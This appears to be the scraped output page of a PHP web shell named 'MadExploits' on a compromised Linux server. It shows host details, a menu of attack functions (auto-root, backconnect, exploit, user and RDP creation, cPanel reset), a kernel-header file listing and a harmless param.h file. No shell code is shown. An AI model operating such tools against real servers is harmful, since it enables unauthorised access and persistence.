Linux r-1tbfree-gecko-e8ip2zsa-2f967-wvg4t 6.12.63-84.121.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Dec 31 02:07:30 UTC 2025 x86_64
PHP/8.5.2 (Development Server)
: | : 10.16.21.217
Cant Read [ /etc/named.conf ]
8.5.2
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
linux /
uapi /
arm64 /
asm /
[ HOME SHELL ]
Name
Size
Permission
Action
auxvec.h
912
B
-rw-r--r--
bitsperlong.h
841
B
-rw-r--r--
bpf_perf_event.h
242
B
-rw-r--r--
byteorder.h
887
B
-rw-r--r--
errno.h
31
B
-rw-r--r--
fcntl.h
1.02
KB
-rw-r--r--
hwcap.h
4
KB
-rw-r--r--
ioctl.h
31
B
-rw-r--r--
ioctls.h
32
B
-rw-r--r--
ipcbuf.h
32
B
-rw-r--r--
kvm.h
16.84
KB
-rw-r--r--
kvm_para.h
34
B
-rw-r--r--
mman.h
542
B
-rw-r--r--
msgbuf.h
32
B
-rw-r--r--
param.h
798
B
-rw-r--r--
perf_regs.h
1.04
KB
-rw-r--r--
poll.h
30
B
-rw-r--r--
posix_types.h
325
B
-rw-r--r--
ptrace.h
9.44
KB
-rw-r--r--
resource.h
34
B
-rw-r--r--
sembuf.h
32
B
-rw-r--r--
setup.h
879
B
-rw-r--r--
shmbuf.h
32
B
-rw-r--r--
sigcontext.h
10.97
KB
-rw-r--r--
siginfo.h
33
B
-rw-r--r--
signal.h
898
B
-rw-r--r--
socket.h
32
B
-rw-r--r--
sockios.h
33
B
-rw-r--r--
stat.h
30
B
-rw-r--r--
statfs.h
842
B
-rw-r--r--
sve_context.h
1.95
KB
-rw-r--r--
swab.h
30
B
-rw-r--r--
termbits.h
34
B
-rw-r--r--
termios.h
33
B
-rw-r--r--
types.h
31
B
-rw-r--r--
ucontext.h
1.04
KB
-rw-r--r--
unistd.h
90
B
-rw-r--r--
unistd_64.h
8.49
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : param.h
/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ /* * Copyright (C) 2012 ARM Ltd. * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License version 2 as * published by the Free Software Foundation. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. */ #ifndef __ASM_PARAM_H #define __ASM_PARAM_H #define EXEC_PAGESIZE 65536 #include <asm-generic/param.h> #endif
Close